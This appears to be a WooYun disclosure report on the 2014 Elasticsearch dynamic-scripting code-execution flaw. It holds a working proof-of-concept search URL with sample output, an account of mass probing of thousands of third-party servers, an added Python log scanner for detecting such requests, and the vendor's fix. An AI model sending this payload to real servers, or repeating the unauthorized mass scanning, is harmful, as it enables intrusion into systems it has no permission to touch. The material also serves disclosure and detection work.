WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-06-25: Details reported to the vendor and awaiting the vendor's handling
2014-06-29: Vendor has confirmed; details disclosed only to the vendor
2014-07-09: Details disclosed to core white hats and experts in the relevant field
2014-07-19: Details disclosed to ordinary white hats
2014-07-29: Details disclosed to intern white hats
2014-08-09: Details disclosed to the public
Within 2 hours, hello world was successfully output on more than 5,000 servers. @cncert National Internet Emergency Center
Because of the Elasticsearch command execution vulnerability, more than ten thousand servers are affected; none of the IPs in the screenshots are duplicates. Within 2 hours the relevant command was successfully executed on more than 5,000 servers.
This was only a technical test of the vulnerability's reach, and the title is deliberately sensational. Of 700 cluster servers tested in China, more than 170 succeeded. Across all tests only about 14,000 IPs were tried, with a success rate close to 50%.
PoC executed:
http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}
The result is as follows:
{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}
This returns the type of the current operating system and the user name under which Elasticsearch is running. Affected IPs in China:
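The probe above arrives as an ordinary GET to `_search` with the whole query body, including the inline script, URL-encoded in the `source` parameter, so a reverse proxy or access log in front of the node already holds what is needed to detect it. The following is an added example (not part of the original report) that scans "combined"-format access log lines for `_search` requests whose `source` carries any inline `script`, whatever its content, since on an affected node every dynamic script from an untrusted client is code execution; the log lines are constructed, and malformed `source` JSON is reported rather than skipped.

```python
import json
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines (not real traffic) in "combined" log format from a reverse
# proxy in front of an Elasticsearch node; line 1 carries an inline script in `source`.
SAMPLE_LOG = r'''
203.0.113.10 - - [25/Jun/2014:10:01:02 +0800] "GET /_search?source=%7B%22size%22%3A1%2C%22script_fields%22%3A%7B%22exp%22%3A%7B%22script%22%3A%22doc%5B%27size%27%5D.value*2%22%7D%7D%7D HTTP/1.1" 200 412 "-" "curl/7.30.0"
203.0.113.11 - - [25/Jun/2014:10:01:05 +0800] "GET /logs/_search?q=status:500 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.12 - - [25/Jun/2014:10:01:09 +0800] "POST /_search HTTP/1.1" 200 9981 "-" "python-requests/2.3"
'''
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*"')

def find_inline_scripts(node, path=""):
    # (json_path, script_text) for every "script" key holding a string, wherever it
    # sits in the query body (script_fields, script-based sorts, custom score, ...).
    found = []
    if isinstance(node, dict):
        for key, val in node.items():
            sub = f"{path}.{key}" if path else key
            if key == "script" and isinstance(val, str):
                found.append((sub, val))
            else:
                found.extend(find_inline_scripts(val, sub))
    elif isinstance(node, list):
        for i, val in enumerate(node):
            found.extend(find_inline_scripts(val, f"{path}[{i}]"))
    return found

def analyse_line(line):
    # Finding for a _search request whose URL-borne `source` carries an inline script,
    # else None. POST bodies are absent from access logs, so they need body logging.
    m = LOG_RE.match(line)
    url = urlsplit(m.group("target")) if m else None
    if url is None or "_search" not in url.path:
        return None
    # Split on '&' by hand: a ';' inside a script body is not a parameter separator.
    src = [unquote(p[7:]) for p in url.query.split("&") if p.startswith("source=")]
    if not src:
        return None
    try:
        scripts = find_inline_scripts(json.loads(src[0]))
    except ValueError:
        scripts = [("<unparsable source>", src[0])]  # fail closed: still report it
    if not scripts:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "scripts": scripts}

def scan(log_text):
    # Findings for every line of an access log, in order.
    return [f for f in map(analyse_line, log_text.strip().splitlines()) if f]
```

On the constructed sample only the first line is reported, with the script located at `script_fields.exp.script`; the POST on line 3 is invisible to this check, which is why request-body logging or disabling dynamic scripting on the node itself is still needed.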
Suggested fix: restrict access by IP.
Severity: High
Vulnerability rank: 20
Confirmed: 2014-06-29 21:34
CNVD has already carried out a round of inspections of government departments for this vulnerability; as of the 27th, only one affected government-department case has been found so far. For the described vulnerability, Knownsec (zoomeye), a CNVD technical group member, has been engaged to assist in completing detection across the whole network, and IP screening of key users is continuing. Batch detection is fairly consistent with CNCERT's approach to nationwide emergency response, and is encouraged. rank 20
None for now.